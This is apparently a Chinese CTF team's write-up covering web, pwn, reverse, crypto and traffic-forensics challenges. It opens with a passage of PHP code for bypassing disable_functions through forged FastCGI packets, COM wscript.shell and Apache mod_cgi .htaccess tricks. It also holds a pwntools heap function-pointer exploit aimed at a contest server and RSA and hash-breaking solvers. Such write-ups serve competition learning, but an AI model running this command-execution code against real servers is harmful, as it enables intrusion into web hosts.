    $params = '0e02434f4e54454e545f4c454e475448'.bin2hex($php_code_len).'0c10434f4e54454e545f545950456170706c69636174696f6e2f746578740b0452454d4f54455f504f5254393938350b095345525645525f4e414d456c6f63616c686f7374110b474154455741595f494e54455246414345466173744347492f312e300f0e5345525645525f534f4654574152457068702f66636769636c69656e740b0952454d4f54455f414444523132372e302e302e310f'.$uri_val_pad.'5343524950545f46494c454e414d45'.bin2hex($uri).'0b'.$uri_val_pad.'5343524950545f4e414d45'.bin2hex($uri).'091f5048505f56414c55456175746f5f70726570656e645f66696c65203d207068703a2f2f696e7075740e04524551554553545f4d4554484f44504f53540b025345525645525f504f525438300f085345525645525f50524f544f434f4c485454502f312e310c0051554552595f535452494e470f165048505f41444d494e5f56414c5545616c6c6f775f75726c5f696e636c756465203d204f6e0d01444f43554d454e545f524f4f542f0b095345525645525f414444523132372e302e302e310b'.$uri_val_pad.'524551554553545f555249'.bin2hex($uri);
    $params_len = strlen(hex2bin($params));
    $params_pad = p(($params_len >> 8) & 0xFF) . p($params_len & 0xFF) . p(0) . p(0);

    $fastcgi_data = '01017b0700080000000100000000000001047b07'.$params_pad.$params.'01047b070000000001057b07'.$php_code_pad.bin2hex($php_code).'01057b0700000000';

    $result = send_socket(hex2bin($fastcgi_data), $host, $port);
//    if($result != FAILURE){
//        $start = md5("s");;
//        $end = md5("e");;
//        $input = $result;
//        $result = substr($input, strlen($start)+strpos($input, $start),(strlen($input) - strpos($input, $end))*(-1));
//    }
    return $result;
}

//var_dump(fastcgi_exec("id",'/var/www/html/shell.php' , '127.0.0.1', 9002));
//echo fastcgi_exec("id",'/var/www/html/ant.php' , 'unix:///run/php/php7.3-fpm.sock');
//var_dump(fastcgi_exec("whoami",'C:\\phpstudy2018\\PHPTutorial\\WWW\test\\apache\\1.php' , '127.0.0.1', 9000));

/*
 * COM执行: 仅限windows
 * work on:
 * php 5.4.45
 *
 * *******
 * fail:
 * > php 5.5.38
 *
 */

function com_exec($cmd){
    $cmd = "cmd.exe /c ".$cmd;
    $cmd_arr = send_cmd($cmd);

    echo "执行时候会黑框, 需要时间; 如果有延时命令执行的时候特别需要注意一下。";

    $wscript = new COM('wscript.shell');
    $wscript->Run($cmd_arr[0]);

    sleep(1);
    return recv_result($cmd_arr[1]);
}

//echo com_exec($_GET['cmd']);

/*
 * Apache mod-cgi: Windows && Linux
 * 需要保证一个web目录可写可访问
 *
 * 注意备份htaccess
 */

function apache_cgi_exec($cmd, $dir='.'){
    echo "由于是系统调用cmd执行后命令，会有一些延迟。请新建目录执行, 以免htaccess出问题导致本身shell不可访问。";
    // check
//    if(!in_array('mod_cgi', apache_get_modules()) && !empty($_SERVER['HTACCESS']) && is_writable($dir)){
//        return FAILURE;
//    }

    $cmd_arr = send_cmd($cmd);
    if(OS == "Windows") {
        $shell_file = "bye.bat";
        $htaccess = "ScriptInterpreterSource Registry-Strict\nAddHandler cgi-script .bat\nOptions +ExecCGI +FollowSymlinks";

        $cmd_arr[0] = escapeshellcmd($cmd_arr[0]);
        $content = "@echo off\necho Content-Type: text/html\nfor /F %%i in ('$cmd_arr[0]') do ( set result=%%i)";
    } else {
        $shell_file = "1.bylinux";
        $htaccess = "Options +ExecCGI\nAddHandler cgi-script .bylinux";
        $content = "#!/bin/bash\necho \"Content-Type: text/html\\n\\n\"\n" . $cmd_arr[0];
    }

    write_file('.htaccess', $htaccess);
    write_file($shell_file, $content);

    echo "<img src = '$shell_file' style = 'display:none;'>";
    sleep(1);
    echo recv_result($cmd_arr[1]);
}

echo ld_preload_exec_cmd('cat /run/log/d8ba573026fb028f7cf59218bafb6df3/flag');

)}}

Pwn

note

放入ida，看一下程序逻辑

重命名一下，看见了amenu函数

不同的选项，对应不同的功能，后续分析要用

不同的分支，对应不同的功能，则可以定位到不同的功能分支。

观察new部分

分析可以知道，chunk的第一个元素被赋值为函数指针，因此根据c++一堆函数指针调用函数的特性，完全可以从此处入手，分析是否有机会可以覆盖函数指针，然后调用我们自己的函数，接下来的问题就是不知道有没有后门函数

：可以找到一个后门，下面就可以考虑覆盖函数指针，使其指向此函数即可。

接着可以分析edit：

存在溢出：

可以溢出到下一个chunk的函数指针。

之后会调用此函数指针指向的函数

思路现在就清晰了，可以申请两个chunk，通过上一个覆盖下一个chunk的函数指针，使其指向我们的后门函数即可。但是现在的问题是如何找到指向后门的指针，观察show函数的时候就会知道需要我们在heap中填入后门地址，那么heap的指针就成为了指向后门的指针。

由于我们还没有看show函数，思路到这里就卡住了，无法获得一个指向后门的函数指针。

有个gift会输出意想不到的东西。

会输出chunk的地址：

现在我们就知道堆地址了，

我们就可以利用了：代码如下：

from pwn import*
#io = process("./note")
io = remote("47.94.109.203",24867)
context.log_level ="debug"
context.terminal = ['tmux','splitw','-h']
io.sendlineafter(b"Choice>>",b'1')
io.sendlineafter(b"Choice>>",b'1')
###show
#gdb.attach(io)
#pause()
io.sendlineafter(b"Choice>>",b'1')
io.sendlineafter(b"Choice>>",b'2')
io.sendlineafter(b"index: ",b'2')
io.recvuntil("0x")
heapadd = io.recvline()
heapadd = int(heapadd,16)
binptr = heapadd + 0x9418ff8-0x9419010-0x20
print(hex(heapadd))
#pause()
###show
io.sendlineafter(b"Choice>>",b'3')
io.sendlineafter(b"index: ",b'0')
io.sendlineafter(b"len: ",b'28')
#payload = 7*p32(0x080489CE)
#gdb.attach(io)
#pause()
io.sendlineafter(b"content: ",5*p32(0x080489CE)+p32(0x21)+p32(binptr))
#pause()
#print(io.recv())

io.sendlineafter(b"Choice>>",b'3')
#print(io.recv())
io.sendlineafter(b"index: ",b'1')

io.sendlineafter(b"len: ",b'32')
io.sendlineafter(b"content: ",b'aaa')
io.interactive()

Reverse

dump

题目里有两个文件，一个是十六进制文件，一个是exe文件。打开十六进制文件，先保存数据

23291e24380e1520370e0520000e37121d0f24010139

使用IDA打开程序，发现main里就是逻辑。这里的argv[1]就是我们的输入

经过动态调试，下断点，调试后发现这里是对输入做变换，然后打印出来。

输入flag{1234567890}:输出如下图所示，f是23，之后的数字是后续。

观察上述数据和十六进制文件的关系，因为一直没看到有对文件进行操作，所以这里比较疑惑。然后比较的时候可以发现前面的数值是雷同的。

多试了几次，发现每个字符对应编码出来的值是一样的。互相之间是独立计算的。所以使用python的库：from string import printable。对里面的字符打印出来，做成一张表来对应。

其中有些字符是0，没有对应的值，打出来数字1和2是有对应值的，2以后都不行，都是0。同时提示说了长度和第13位。因为0有很多可能，根据提示能知道，这一位是4。根据表可得flag

最终打表可得：

'''
flag{      M  T   c  z  M  D  c  4  M  z  Q  2  N  g =  =  }
23291e2438 0e 15 20 37 0e 05 20 00 0e 37 12 1d 0f 24 01 01 39
1 2 3 4 5  6  7  8  9  10 11 12 13 14 15
'''

# a   b c   d  e  f  g  h  i  j  k l   m  n  o  p  q  r s  t   u   v   w  x  y  z  1  2
# 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32  33  34 35 36 37 1c 1d
#
# A   B  C  D  E  F  G  H  I J  K  L  M  N  O  P  Q  R  S   T  U  V W   X  Y Z
# 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b

from string import printable
for tmp in printable:
    print(tmp,end="")
#flag{MTczMDc4MzQ2Ng==}

Crypto

fffffhash

分析0x0000000001000000000000000000013b这一串数字，在网上查找

发现这是128位的FNV哈希的一个参数，在网上搜索FNV相关的知识，结果搜到了类似的题目（64位FNV）

然后将解题脚本稍微修改了一下，就跑出来了

py脚本：

TARGET = 201431453607244229943761366749810895688
h0 = 0x6c62272e07bb014262b821756295c58d
p = 0x0000000001000000000000000000013b
MOD = 2^128

n = 30
M = Matrix.column([p^(n - i - 1) for i in range(n)] + [-(TARGET - h0*p^n), MOD])
M = M.augment(identity_matrix(n+1).stack(vector([0] * (n+1))))
Q = Matrix.diagonal([2^128] + [2^4] * n + [2^8])
M *= Q
M = M.BKZ()
M /= Q
for r in M:
    if r[0] == 0 and abs(r[-1]) == 1:
        r *= r[-1]
        good = r[1:-1]
        print(good)
        break
inp = []
y = int(h0*p)
t = (h0*p^n + good[0] * p^(n-1)) % MOD
for i in range(n):
    for x in range(256):
        y_ = (int(y) ^^ int(x)) * p^(n-i-1) % MOD
        if y_ == t:
            print('good', i, x)
            inp.append(x)
            if i < n-1:
                t = (t + good[i+1] * p^(n-i-2)) % MOD
                y = ((int(y) ^^ int(x)) * p) % MOD
            break
    else:
        print('bad', i)
print(bytes(inp).hex())

跑出来的结果：

所以得到了我们的hex_string

然后nc交互就可以了，如下所示：

flag{508074eb-ea1b-4608-9bdb-64e6d73e2655}

rasnd

两个部分的拼凑

第一部分是前段时间强网杯的apdq的第二部分，直接套板子就出来了

#part1
n=28887811227499051616528094429019003663717623904277565919075044655116848454702243443222138650839802532457876075543066292240383592982003544521377684917140524085713240851320087700637160892340521450393565882070831401986253770658662871222156018676508909050373444215149175943226203798935993199035325044630185976663003232467964487143314972938428288758994373432653784346882713174719140391514347600850788886148311039655932116903027672113333591490675960703395369201502464526771460999324722209109938614286150245265511899004435237837454069138941745952479175479274675250566087400534051161079388742074574161312192043701412913886879
c=12904862358252536205392970372996437799373602343641649800438666554968935383265314461895472296763366221390375513224953980022691144110127251816378756979174253143874738105909473714409576815667746200188582929727948993200023081398594917163571324435295811041599701791670116306237799243786230718765077662418219690489181151068715116557561366214233881032505810402132893400971807723389883203848637967177002497144918823825923464608185799494223184876201542806244059208328032164925668486389879511335562451730919596497353207496613303380375801193934636085352103680453435947151045227281898926345875209127168252450738017665556659823293
hint1=377177973587575850466901754568881568812740281610024306026199181684494762091512999340415335806051052710588140980770351324449498146395095691664930883421912024544523884628292027615631463699276645005996099180207059939697896427175045969513335989186018906424156601382567472008947296866700129244023038476994696464956187676767165999552159908068623501+0x114
hint2=7181804289463325714939537449620677120608402749084085104997954266645742337112146883176759025627406327132463813893784187427062727563053446288300954407999801433816793840360522607395887308951891396620953517561723843530407447008241903967390660485941935151813958917072982711483327150689765967737844070049797477796050409421814053857382004868595748173297461069739232023287436317552899867260535988259736223827987858334777288892948771592938879108032542724655660055953059782+0x514

import itertools
#from Crypto.Util.number import long_to_bytes
from tqdm import tqdm
from math import gcd

for a1, a2 in tqdm(list(itertools.product(range(2**12), repeat=2))):
    kq = gcd(a1 * hint1 - a2 * hint2, n)
    if 1 < kq < n:
        print('find!', kq, a1, a2)
        break
for i in range(2**16, 1, -1):
    if kq % i == 0:
        kq //= i
q = kq
p = n // kq
d = pow(0x10001, -1, (p - 1) * (q - 1))
print(d)

解得d后正常解密即可

from Crypto.Util.number import long_to_bytes
d=23907366912691968835577624634040812376408997746619567882551723026751722332211426825663096512569223640927266774269570312320275955813630594133855423265267982137737686456412391728445890603457057882210754631914151602620358454201207818626841297907693214658500615947346704988154826153877815571803377630508751194016044821159736834012130046315763891301572528300800270589349185383179339008172340480814901009286441308922386924830307903892751895522131345775410180999796185964203138795696737875885592819391495282427460200856076157745310030154909372824593618530916342795687746095429297760084659027083995509824303304962460646012273
c=12904862358252536205392970372996437799373602343641649800438666554968935383265314461895472296763366221390375513224953980022691144110127251816378756979174253143874738105909473714409576815667746200188582929727948993200023081398594917163571324435295811041599701791670116306237799243786230718765077662418219690489181151068715116557561366214233881032505810402132893400971807723389883203848637967177002497144918823825923464608185799494223184876201542806244059208328032164925668486389879511335562451730919596497353207496613303380375801193934636085352103680453435947151045227281898926345875209127168252450738017665556659823293
n=28887811227499051616528094429019003663717623904277565919075044655116848454702243443222138650839802532457876075543066292240383592982003544521377684917140524085713240851320087700637160892340521450393565882070831401986253770658662871222156018676508909050373444215149175943226203798935993199035325044630185976663003232467964487143314972938428288758994373432653784346882713174719140391514347600850788886148311039655932116903027672113333591490675960703395369201502464526771460999324722209109938614286150245265511899004435237837454069138941745952479175479274675250566087400534051161079388742074574161312192043701412913886879
m=pow(c,d,n)
print(long_to_bytes(m))
#b'flag{7f33cdc8-da19-'

然后第二部分，就是DUCTF2020的EasyRSA，修改一下数字就可以了

https://crypto-writeup-public.hatenablog.com/entry/DownUnderCTF%25202020%2520%257C%2520%2520%2520babyRSA

#part2
from gmpy2 import *
from sympy.solvers import solve
from sympy import symbols
n=16235562199200267459663730571049431604560323138825891010565012084966378560657028557593713658149224124014019674718841338098341965331592933997415694692050656493911264929774020942179882196570321425270890223396169112762011033004564308723485972391649681397363565727449598074059933122020979277213051522292750681766691422016751120287403039252908062651404902039208868924707593108364706700085611092189177151362213092719343563439787881931506466123650653478905555329561874204870585566987658878227630910823854130181333087408403245083629898953751267545552289595198873283690722202122622106505732576237684209082112223769923295430523
c=11618635355226290496294059660684603271588961451576288595852951276334806609033643787615488344507896857194047959998447214859969744967026400630924460267578943153410706528035442130937391499097216199001992180336450905339834216101657701141898474167790182212942369008350602241504906953057533358121870137756984024718626959548768270243611602403692209977991118081549322098177312841836591127963898605893447513836841527304670334168898249244877428516320988326935026436339811852851774767266645087443342058339001680095456544461819091726014417859396827670899885993279204262383019508480189625007076070194718973783400618991012898398971
s=7547052520968274686361390354285315087014340779570155974910998576495561953587318079357069880644559171407046420462937990129522060964321221028493396033041599196464187957179980446173784787331698698561742332536751956414220040013365969434115189539462094772621278876850660929745673861325132019440705142779617380382511054084461569440985254700562753414759088555879937884688154445987875415437130349205506768368786816237719717004795323391266775205156239444277181913569391343776187901301703075697132319977481036429174361283683381079528630613358434337746208635554486300034455331087173311239089359066587253492149727949991752157130

t = invert(s, n)

p, q = symbols("p, q", integer=True)
solutions = solve([514*p - 114*q - t, p*q - n])
p = solutions[0][p]
q = solutions[0][q]
print(p)
print(q)
#107039821091476907017361040577100142080416506607330385914714896527723104434231991867446553926956088272494931767357910005226685224323888560118102752832821265121788585829575612779765001594434154517988820915969980410997090848817455330109147139014661903366930742269344732454435610621218450264594885489462013983987
#151677777799397230712001297032535496815539593864839536857494497889357845204973853077974576890314781663504855038646614281597509142082401258190873413836743927444104379591420166860126996505224123494050068333796017557802283729445202439509483655265818829771274657687534045119516831069023231285659118123116078992729

然后解得d

from gmpy2 import *
p=107039821091476907017361040577100142080416506607330385914714896527723104434231991867446553926956088272494931767357910005226685224323888560118102752832821265121788585829575612779765001594434154517988820915969980410997090848817455330109147139014661903366930742269344732454435610621218450264594885489462013983987
q=151677777799397230712001297032535496815539593864839536857494497889357845204973853077974576890314781663504855038646614281597509142082401258190873413836743927444104379591420166860126996505224123494050068333796017557802283729445202439509483655265818829771274657687534045119516831069023231285659118123116078992729
d = invert(65537, (p-1)*(q-1))
print(d)
#6109052349547257206697096233914872260989327686702877341357297374235483700898764426663731614354637333081857960824673503479028836612555987493725239652501170165553073731910636074799821398102203737540323068021873603013735631382159022431926454967088532329203130000441080435575597765980092908983838908398907972784232273234118645498740450016498454462799191401029143802550110050596585913392562268596838785215043032391431672670233571868072460160423058850272542871308182251910122824582051543573456850142342031440175701154950554859876416850016770939690923082085654825466912802560496063162148070829301504935160652899585466110913

最终：

from Crypto.Util.number import *
n=16235562199200267459663730571049431604560323138825891010565012084966378560657028557593713658149224124014019674718841338098341965331592933997415694692050656493911264929774020942179882196570321425270890223396169112762011033004564308723485972391649681397363565727449598074059933122020979277213051522292750681766691422016751120287403039252908062651404902039208868924707593108364706700085611092189177151362213092719343563439787881931506466123650653478905555329561874204870585566987658878227630910823854130181333087408403245083629898953751267545552289595198873283690722202122622106505732576237684209082112223769923295430523
e=65537
d=6109052349547257206697096233914872260989327686702877341357297374235483700898764426663731614354637333081857960824673503479028836612555987493725239652501170165553073731910636074799821398102203737540323068021873603013735631382159022431926454967088532329203130000441080435575597765980092908983838908398907972784232273234118645498740450016498454462799191401029143802550110050596585913392562268596838785215043032391431672670233571868072460160423058850272542871308182251910122824582051543573456850142342031440175701154950554859876416850016770939690923082085654825466912802560496063162148070829301504935160652899585466110913
c=11618635355226290496294059660684603271588961451576288595852951276334806609033643787615488344507896857194047959998447214859969744967026400630924460267578943153410706528035442130937391499097216199001992180336450905339834216101657701141898474167790182212942369008350602241504906953057533358121870137756984024718626959548768270243611602403692209977991118081549322098177312841836591127963898605893447513836841527304670334168898249244877428516320988326935026436339811852851774767266645087443342058339001680095456544461819091726014417859396827670899885993279204262383019508480189625007076070194718973783400618991012898398971
m=pow(c,d,n)
print(long_to_bytes(m))
#b'4daa-b621-da2f37dc0435}'

将两个部分合起来，就是最后的flag了

flag{7f33cdc8-da19-4daa-b621-da2f37dc0435}

威胁检测与网络流量分析

zeroshell_1

打开附件的数据包

搜http可以直接找到一个关键的路径

跟踪数据包看一下

直接执行了命令

然后refer里面就是flag

zeroshell_2

拿poc直接打，然后搜索全部文件中包含flag的

可以搜到，然后直接cat

zeroshell_3

我们队伍先做的4，再做的3

根据队友传出来的文件，使用IDA查看这个文件，查看字符串，往下翻发现可疑ip和密码

查看该字符串存放位置，在根据调用链查看，该函数位于start，看起来也比较符合网络连接的代码。进行尝试，发现是正确的ip地址

zeroshell_4

猜测隐藏文件以.开头，直接搜

看到一个nginx文件很可疑

看到一个elf文件

下载提取其中的elf文件，然后发给逆向手，逆向手去做的3和5

最终4的flag就是flag{.nginx}

zeroshell_5

根据zeroshell_5解答正确，根据队友传出来的文件，使用IDA查看这个文件，查看字符串，往下翻发现可疑ip和密码

查看该字符串存放位置，在根据调用链查看，该函数位于start，看起来也比较符合网络连接的代码。同时这个密钥也在ip下方，进行尝试，发现是正确的。

WinFT_1

打开主机，桌面有一个currports程序，我们打开，下面有一个正在运行的exe程序

双击这个程序

flag{miscsecure.com:192.168.116.130:443}

WinFT_2

打开PCHunter程序，进入电脑体检中

选择启动信息，生成检测报告，最后一行有一个奇怪的命令，里面有flag

导出报告，cyberchef直接梭

得到flag

sc05_1

告警IP为134.6.4.12（简称IP1），然后问我们IP1地址首次被请求时间是多久？

所以我们直接在firewall的excel中查找该ip地址

首先在http-export中搜索该ip

然后将2024/11/09_16:23:57 MD5加密，上交flag，发现错误

然后再去第二个表中查找，发现找不到

然后在tcp-export中进行查找

发现找到了两个ip地址，一个一个试

发现2024/11/09_16:22:42这个时间，MD5加密得到flag，就对了

得到flag{01DF5BC2388E287D4CC8F11EA4D31929}